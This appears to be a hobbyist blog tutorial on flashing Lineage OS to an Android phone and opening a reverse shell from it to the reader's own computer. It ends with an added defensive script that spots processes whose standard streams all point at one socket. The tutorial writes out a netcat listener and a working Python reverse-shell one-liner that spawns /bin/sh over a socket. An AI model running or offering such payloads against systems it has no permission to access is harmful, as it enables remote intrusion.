How to set up a reverse shell on your Android device

In this post we’ll set up a reverse shell on the Lineage OS Android distribution, but the same can be achieved on other distros as well.

First, let’s see how to install Lineage OS on your device. Feel free to skip this section if you’re not interested.

Jailbreak and install Lineage OS

Before you start, you may need to jailbreak your device. Once you’ve done that, follow the steps below to install Lineage OS.

Step 1. Find your device here.

Step 2. Download the builds. For example, for a Moto G7, the builds are available here.

Step 3. Download adb and fastboot and extract the files somewhere on your system. More info here. For example, for Linux, the zip file is available here. Once you have the executables, enable USB debugging on your Android device, connect it to your computer and run adb devices. You should see the device listed in your terminal.

Step 4. Restart the device in fastboot mode by running the command: adb -d reboot bootloader

Step 5. Once the phone boots up, run the command fastboot devices. You should see the device listed there. If you haven’t unlocked your device, now is the time to do it. The Lineage OS website will have the link that you need. For example, for Motorola it’s this one.

Step 6. Now that you’re in fastboot mode, we can start installing the images you downloaded at Step 2. Make sure they’re in the same folder as your adb and fastboot executables. Now run the command fastboot flash boot boot.img. When it’s done, reboot your Android system and select the Recovery option.

Step 7. Make sure that your partitions are consistent by following the steps outlined here. Basically, you download this zip file, select Apply Update -> Apply from ADB on your Android device and then from your terminal run this command: adb -d sideload

Step 8. Reboot the device, select Recovery mode, then Factory reset -> Format data / factory reset. When it’s done, go back to the main menu, select Apply Update -> Apply from ADB, then run this command on your computer: adb -d sideload lineage-<version>-<build_number>-nightly-<phone_codename>

You’re done installing the OS, now let’s have some fun 🙂

Start a reverse shell on your Android device

You already have a browser, but we need one more thing. (Optional) Visit the F-Droid website on your Android device and install the app.

We’ll need Termux, which is a terminal emulator and a Linux environment app. Open the F-Droid app, then search for and install the Termux app. You can also install it straight from the Termux website. This will give you access to a lot of Linux executables.

Open the Termux app and run the command pkg install python

Let’s start setting up our reverse shell.

Step 1. Connect your phone, enable USB debugging and run adb devices. Once the device shows up there, we’re ready to start. Set up netcat on your computer (nc -lvp 8448). From here on, we’ll assume your computer’s IP is Change it to reflect your computer’s address.

Step 2. If you want to have your filesystem fully writable, run

adb root

adb shell mount -o rw,remount /

If you don’t need to, just run adb shell

Step 3. On the Android device, go to where Termux has the python executable installed. Try cd /data/data/com.termux/files/usr/bin or run the command find / -name termux to locate Termux’s folder. Now it’s time to set up the reverse shell. For this, run the command:

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",8448));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

You can find more python payloads here.

Go back to your terminal and voila. You have the reverse shell 🙂
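
Seen from the defender's side, the one-liner above leaves a clear trace: after the three os.dup2 calls, the python process has stdin, stdout and stderr all pointing at the same TCP socket. The script below is an added example, not part of the original post. It scans a /proc-style tree for that pattern and assumes enough privilege to read other processes' fd entries (for example the adb root shell from Step 2). The function names and the sample tree are constructed for illustration.

```python
import os
import re
import tempfile

SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")

def stdio_socket_inode(proc_root, pid):
    """Return the socket inode if fds 0, 1 and 2 all point at one socket, else None."""
    targets = []
    for fd in ("0", "1", "2"):
        try:
            targets.append(os.readlink(os.path.join(proc_root, pid, "fd", fd)))
        except OSError:  # process exited, fd closed, or not readable
            return None
    match = SOCKET_LINK.match(targets[0])
    if match and targets.count(targets[0]) == 3:
        return int(match.group(1))
    return None

def find_socket_backed_stdio(proc_root="/proc"):
    """List (pid, socket inode, command line) for every process matching the pattern."""
    hits = []
    for pid in sorted(filter(str.isdigit, os.listdir(proc_root)), key=int):
        inode = stdio_socket_inode(proc_root, pid)
        if inode is None:
            continue
        try:
            with open(os.path.join(proc_root, pid, "cmdline"), "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            cmdline = ""
        hits.append((int(pid), inode, cmdline))
    return hits

def build_sample_proc(root):
    """Constructed sample tree mimicking /proc: only pid 202 has all stdio on one socket."""
    sample = {
        "101": (["/dev/pts/0"] * 3, b"sh\0"),
        "202": (["socket:[40417]"] * 3, b"python\0-c\0import socket,os,pty;...\0"),
        "303": (["/dev/null", "socket:[5150]", "socket:[5150]"], b"logd\0"),
    }
    for pid, (links, cmdline) in sample.items():
        os.makedirs(os.path.join(root, pid, "fd"))
        for fd, target in enumerate(links):
            os.symlink(target, os.path.join(root, pid, "fd", str(fd)))
        with open(os.path.join(root, pid, "cmdline"), "wb") as f:
            f.write(cmdline)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample_proc(root)
        print(find_socket_backed_stdio(root))
```

The shell started by pty.spawn runs on a pseudo-terminal, so it is the parent python process that matches. Services launched inetd-style also have stdio on a socket, so treat each hit as a lead to check against the command line rather than as a verdict.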